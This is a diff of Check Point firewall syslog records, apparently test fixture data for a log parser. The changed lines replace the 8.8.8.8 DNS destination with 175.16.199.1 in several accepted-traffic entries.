 <134>1 2020-03-29T22:23:24Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e811fdc,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"43103"; service:"514"; service_id:"syslog"; src:"192.168.1.100"]
 <134>1 2020-03-29T22:23:26Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e811fde,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"60640"; service:"514"; service_id:"syslog"; src:"192.168.1.100"]
 <134>1 2020-03-29T22:23:29Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e811fe1,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.100"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"52116"; service:"443"; service_id:"https"; src:"192.168.1.117"]
 <134>1 2020-03-29T22:23:29Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e811fe1,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.100"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"52117"; service:"443"; service_id:"https"; src:"192.168.1.117"]
 <134>1 2020-03-29T22:23:29Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e811fe1,0x3,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.100"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"52118"; service:"443"; service_id:"https"; src:"192.168.1.117"]
 <134>1 2020-03-29T22:23:29Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e811fe1,0x4,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.100"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"52119"; service:"443"; service_id:"https"; src:"192.168.1.117"]
-<134>1 2020-03-29T22:23:33Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e811fe5,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585520613"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"58319"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T22:23:33Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e811fe5,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585520613"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"58319"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T22:23:40Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e811fec,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"59638"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
 <134>1 2020-03-29T22:23:40Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e811fec,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"104.81.142.43"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"44284"; service:"443"; service_id:"https"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"10674"; xlatesrc:"0.0.0.0"]
 <134>1 2020-03-29T22:23:40Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e811fec,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"49371"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
 <134>1 2020-03-29T22:23:40Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e811fec,0x3,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.124.249.31"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"39524"; service:"80"; service_id:"http"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"10675"; xlatesrc:"0.0.0.0"]
 <134>1 2020-03-29T22:23:40Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e811fec,0x4,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"5"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"57464"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
 <134>1 2020-03-29T22:23:40Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e811fec,0x5,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"6"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.124.249.41"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"59608"; service:"80"; service_id:"http"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"10676"; xlatesrc:"0.0.0.0"]
-<134>1 2020-03-29T22:23:43Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e811fef,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585520623"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"57332"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T22:23:43Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e811fef,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585520623"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"57332"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T22:23:44Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e811ff0,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.100"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"52120"; service:"443"; service_id:"https"; src:"192.168.1.117"]
 <134>1 2020-03-29T22:23:45Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e811ff0,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.100"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"52121"; service:"443"; service_id:"https"; src:"192.168.1.117"]
 <134>1 2020-03-29T22:23:45Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e811ff1,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.100"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"52122"; service:"443"; service_id:"https"; src:"192.168.1.117"]
 <134>1 2020-03-29T22:23:45Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e811ff1,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.100"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"52123"; service:"443"; service_id:"https"; src:"192.168.1.117"]
-<134>1 2020-03-29T22:23:53Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e811ff9,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585520633"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"45470"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T22:24:03Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e812003,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585520643"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"46191"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T22:24:13Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e81200d,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585520653"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"52696"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T22:23:53Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e811ff9,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585520633"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"45470"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T22:24:03Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e812003,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585520643"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"46191"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T22:24:13Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e81200d,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585520653"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"52696"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T22:24:15Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e81200f,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"60640"; service:"514"; service_id:"syslog"; src:"192.168.1.100"]
-<134>1 2020-03-29T22:24:23Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e812017,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585520663"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"49680"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T22:24:33Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e812021,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585520673"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"56420"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T22:24:23Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e812017,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585520663"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"49680"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
